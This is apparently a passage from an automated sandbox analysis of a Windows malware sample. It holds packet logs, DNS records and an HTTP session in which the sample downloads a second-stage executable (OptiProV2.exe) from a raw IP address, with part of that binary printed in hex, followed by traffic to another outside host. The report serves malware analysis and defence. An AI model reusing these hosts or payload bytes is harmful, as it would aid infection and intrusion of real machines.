                                            Oct 5, 2024 14:36:18.813380003 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.813396931 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.813411951 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.813426018 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.813432932 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.813441992 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.813472986 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.813509941 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.813538074 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.813553095 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.813606024 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.813657045 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.813676119 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.813690901 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.813707113 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.813720942 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.813720942 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.813738108 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.813754082 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.813767910 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.813811064 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.814047098 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814063072 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814078093 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814095020 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814105988 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.814110041 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814126015 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814140081 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.814141989 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814160109 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814176083 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814182043 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.814201117 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.814245939 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.814436913 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814451933 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814466953 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814483881 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814500093 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814515114 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814516068 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.814538002 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814554930 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814555883 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.814573050 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814575911 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.814610004 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.814826012 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814841032 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814856052 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814871073 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814879894 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.814887047 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814903975 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814903975 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.814919949 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814945936 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.814963102 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814965963 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.814977884 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.814995050 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815010071 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815023899 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815041065 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815056086 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.815057993 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815074921 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815088987 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815097094 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.815104961 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815114021 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.815119982 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815135956 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815152884 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815169096 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.815198898 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.815665007 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815686941 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815726042 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.815860033 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815876007 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815890074 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815906048 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815917015 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.815936089 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815956116 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815967083 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.815979004 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.815999985 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816014051 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.816019058 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816034079 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816051006 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816051960 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.816066027 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816082001 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816087961 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.816097975 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816106081 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.816112995 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816126108 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.816129923 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816144943 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816159964 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816169977 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.816175938 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816195965 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816209078 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.816237926 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.816797018 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816812992 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816827059 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816843033 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816853046 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.816859961 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816870928 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.816875935 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816893101 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816910028 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816910028 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.816926956 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816941977 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816951990 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.816958904 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816975117 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816992044 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.816992998 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.817008972 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.817028999 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.817045927 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.866903067 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.899497032 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.899555922 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.899595022 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.899652004 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.899652958 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.899724007 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.899759054 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.899776936 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.899812937 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.899833918 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.899854898 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.899905920 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.899936914 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.899955034 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.899962902 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.899971008 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.899986982 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900003910 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900015116 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900023937 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900032043 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900047064 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900062084 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900069952 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900078058 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900093079 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900103092 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900109053 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900129080 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900141954 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900183916 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900248051 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900262117 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900278091 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900295973 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900310993 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900321960 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900347948 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900374889 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900459051 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900476933 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900496960 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900518894 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900531054 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900568962 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900759935 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900782108 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900795937 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900811911 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900827885 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900837898 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900846004 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900863886 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900877953 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900878906 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900896072 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900897026 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900913000 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.900942087 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.900975943 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.901009083 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901222944 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901238918 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901254892 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901269913 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901285887 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901292086 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.901300907 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901318073 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901331902 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.901335001 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901360989 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901375055 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901380062 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.901391029 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901406050 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901415110 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.901421070 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901432037 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.901437044 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901454926 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901475906 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.901510954 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.901741028 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901756048 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901770115 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.901810884 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.945019960 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:19.466924906 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:37:57.821764946 CEST567944140192.168.2.7147.185.221.21
                                            Oct 5, 2024 14:37:57.826756954 CEST414056794147.185.221.21192.168.2.7
                                            Oct 5, 2024 14:37:57.826877117 CEST567944140192.168.2.7147.185.221.21
                                            Oct 5, 2024 14:37:57.973892927 CEST567944140192.168.2.7147.185.221.21
                                            Oct 5, 2024 14:37:57.978718996 CEST414056794147.185.221.21192.168.2.7
                                            Oct 5, 2024 14:38:08.308845997 CEST567944140192.168.2.7147.185.221.21
                                            Oct 5, 2024 14:38:08.313750029 CEST414056794147.185.221.21192.168.2.7
                                            Oct 5, 2024 14:38:16.935225010 CEST567944140192.168.2.7147.185.221.21
                                            Oct 5, 2024 14:38:16.940123081 CEST414056794147.185.221.21192.168.2.7

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 5, 2024 14:36:42.374264956 CEST5357251162.159.36.2192.168.2.7
                                            Oct 5, 2024 14:36:42.905399084 CEST5787453192.168.2.71.1.1.1
                                            Oct 5, 2024 14:36:42.914617062 CEST53578741.1.1.1192.168.2.7

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Oct 5, 2024 14:36:42.905399084 CEST192.168.2.71.1.1.10x48d7Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Oct 5, 2024 14:36:42.914617062 CEST1.1.1.1192.168.2.70x48d7Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • 15.235.206.13

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.74969915.235.206.13806440C:\Users\user\Desktop\r4RF3TX5Mi.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 5, 2024 14:36:15.758919954 CEST76OUTGET /OptiProV2.exe HTTP/1.1
                                            Host: 15.235.206.13
                                            Connection: Keep-Alive
                                            Oct 5, 2024 14:36:16.641987085 CEST1236INHTTP/1.1 200 OK
                                            Date: Sat, 05 Oct 2024 12:36:16 GMT
                                            Server: Apache/2.4.62 (Debian)
                                            Last-Modified: Tue, 01 Oct 2024 07:49:17 GMT
                                            ETag: "200000-623658ef3c1fc"
                                            Accept-Ranges: bytes
                                            Content-Length: 2097152
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: application/x-msdos-program
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 be a7 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 06 01 00 00 86 00 00 00 00 00 00 4e 25 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 02 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 24 01 00 4f 00 00 00 00 40 01 00 0e 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELfN% @@ @$O@ H.textT `.rsrc@@@.reloc@B0%HH^&(*rp* S*(*rEp* x!*ssss*rp* V*rp* O*rp* Q*rUp* E/*rp* *((*rp* *rp* e*"(+*&(&+*+5sN 'oO(,~-(G(9~oP&-*r=p* *p{*rp* Yb*rp*rp* *rMp* (:*
                                            Oct 5, 2024 14:36:16.642030954 CEST1236INData Raw: 1a 72 91 07 00 70 2a 1a 20 6b f7 34 02 2a ee 16 80 12 00 00 04 14 80 13 00 00 04 16 6a 80 14 00 00 04 14 80 16 00 00 04 14 80 17 00 00 04 16 73 51 00 00 0a 80 18 00 00 04 14 80 19 00 00 04 7e 0a 00 00 04 80 1a 00 00 04 2a 22 28 49 00 00 06 2b 00
                                            Data Ascii: rp* k4*jsQ~*"(I+*:t(D+*rp* Xz*r!p* d*rep* *rp* ~H*rp* *r1p* /]*rup* L*rp* m*rp* *rAp*rp* v
                                            Oct 5, 2024 14:36:16.642043114 CEST1236INData Raw: 1a 20 9e 84 7b 02 2a 1a 72 b5 26 00 70 2a 1a 72 db 26 00 70 2a 1a 20 12 ae d6 04 2a 1a 72 01 27 00 70 2a 1a 20 40 2a 67 01 2a 1a 72 27 27 00 70 2a 1a 20 ee cd 27 04 2a 1a 72 4d 27 00 70 2a 1a 20 a1 d4 a7 04 2a 13 30 01 00 0f 00 00 00 01 00 00 11
                                            Data Ascii: {*r&p*r&p* *r'p* @*g*r''p* '*rM'p* *0~o+*0~o+*0~o +*0~o!+*0("(#+*0($+*0
                                            Oct 5, 2024 14:36:16.642143965 CEST672INData Raw: 02 0f 32 00 00 01 1b 30 04 00 fc 00 00 00 0c 00 00 11 28 3e 00 00 06 28 3e 00 00 0a 39 ec 00 00 00 73 48 00 00 0a 0a 06 72 2d 05 00 70 6f 49 00 00 0a 06 17 6f 3d 00 00 0a 06 72 4b 05 00 70 7e 2f 00 00 04 72 bf 05 00 70 28 32 00 00 0a 6f 41 00 00
                                            Data Ascii: 20(>(>9sHr-poIo=rKp~/rp(2oA(BoCrp(JoKoLrp(2oA(BoC1rKp~r[p~rp(@oA(BoCrp~(Mrp(2oA
                                            Oct 5, 2024 14:36:16.642155886 CEST1236INData Raw: 43 00 00 06 73 5c 00 00 0a 14 6f 5d 00 00 0a 26 14 fe 06 4a 00 00 06 73 5e 00 00 0a 0b 07 14 73 4e 00 00 0a 20 10 27 00 00 20 98 3a 00 00 6f 4f 00 00 0a 73 4e 00 00 0a 20 10 27 00 00 20 98 3a 00 00 6f 4f 00 00 0a 73 5f 00 00 0a 80 17 00 00 04 14
                                            Data Ascii: Cs\o]&Js^sN ' :oOsN ' :oOs_Hs^s_ %(/(1~o`&*A42""0sarp~("
                                            Oct 5, 2024 14:36:16.642168999 CEST1236INData Raw: 28 81 00 00 0a 72 13 08 00 70 28 81 00 00 0a 28 2d 00 00 0a 0d 11 05 6f 78 00 00 0a 2d c7 de 0c 11 05 2c 07 11 05 6f 79 00 00 0a dc 09 0a de 1b de 19 28 2f 00 00 0a 72 59 08 00 70 0a 28 31 00 00 0a de 07 28 31 00 00 0a de 00 06 2a 00 01 1c 00 00
                                            Data Ascii: (rp((-ox-,oy(/rYp(1(1*Jbtt20rMpsorCpovo&rprpodrprpodrprpod0rCpovo&%(/rYp(1(1
                                            Oct 5, 2024 14:36:16.642182112 CEST1236INData Raw: 28 99 00 00 0a dc 2a 00 00 00 01 28 00 00 02 00 2a 00 70 9a 00 0a 00 00 00 00 00 00 24 00 82 a6 00 14 32 00 00 01 02 00 11 00 ab bc 00 0c 00 00 00 00 1b 30 02 00 23 00 00 00 18 00 00 11 7e 13 00 00 04 02 6f 9a 00 00 0a 26 de 14 25 28 2f 00 00 0a
                                            Data Ascii: (*(*p$20#~o&%(/(1*20~, ~o%(/(1~, ~o%(/(1~,*~o~o%(/
                                            Oct 5, 2024 14:36:16.642194033 CEST104INData Raw: 16 33 42 7e 21 00 00 04 6f ad 00 00 0a de 0e 25 28 2f 00 00 0a 0d 28 31 00 00 0a de 00 14 fe 06 84 00 00 06 73 91 00 00 0a 73 92 00 00 0a 80 21 00 00 04 7e 21 00 00 04 06 17 9a 6f ae 00 00 0a 38 f4 04 00 00 11 13 72 c5 10 00 70 16 28 6c 00 00 0a
                                            Data Ascii: 3B~!o%(/(1ss!~!o8rp(l3 ~!o%(/
                                            Oct 5, 2024 14:36:16.642205954 CEST1236INData Raw: 04 28 31 00 00 0a de 00 38 c4 04 00 00 11 13 72 d7 10 00 70 16 28 6c 00 00 0a 16 33 43 7e 22 00 00 04 6f ad 00 00 0a de 0f 25 28 2f 00 00 0a 13 05 28 31 00 00 0a de 00 14 fe 06 85 00 00 06 73 91 00 00 0a 73 92 00 00 0a 80 22 00 00 04 7e 22 00 00
                                            Data Ascii: (18rp(l3C~"o%(/(1ss"~"o8qrp(l3 ~"o%(/(18Arp(l3(rp~((((-(E8rp(l3b%(rp(+rp~
                                            Oct 5, 2024 14:36:16.642271996 CEST1236INData Raw: 28 2f 00 00 0a 13 12 11 12 6f b3 00 00 0a 28 7b 00 00 06 28 31 00 00 0a de 00 2a 00 00 00 41 f4 00 00 00 00 00 00 6a 01 00 00 1c 00 00 00 86 01 00 00 0c 00 00 00 32 00 00 01 00 00 00 00 9d 02 00 00 0c 00 00 00 a9 02 00 00 0e 00 00 00 32 00 00 01
                                            Data Ascii: (/o({(1*Aj222+2r~2ODH2cy2%2ca
                                            Oct 5, 2024 14:36:16.647012949 CEST1236INData Raw: 72 eb 12 00 70 16 28 cf 00 00 0a 39 a7 00 00 00 7e 1f 00 00 04 18 9a 28 d2 00 00 0a 39 91 00 00 00 7e 20 00 00 04 17 3b 81 00 00 00 17 80 20 00 00 04 07 14 72 71 12 00 70 18 8d 03 00 00 01 13 08 11 08 16 14 a2 11 08 17 1b 8d 03 00 00 01 13 09 11
                                            Data Ascii: rp(9~(9~ ; rqp(~((~~~((-(z 8rCp(rp(,c~(-U~ 3K


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:1
                                            Start time:08:36:09
                                            Start date:05/10/2024
                                            Path:C:\Users\user\Desktop\r4RF3TX5Mi.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\r4RF3TX5Mi.exe"
                                            Imagebase:0x20da6970000
                                            File size:39'936 bytes
                                            MD5 hash:A17ED4E602B0D341FC887925BBA26643
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:08:36:09
                                            Start date:05/10/2024
                                            Path:C:\Windows\System32\conhost.exe
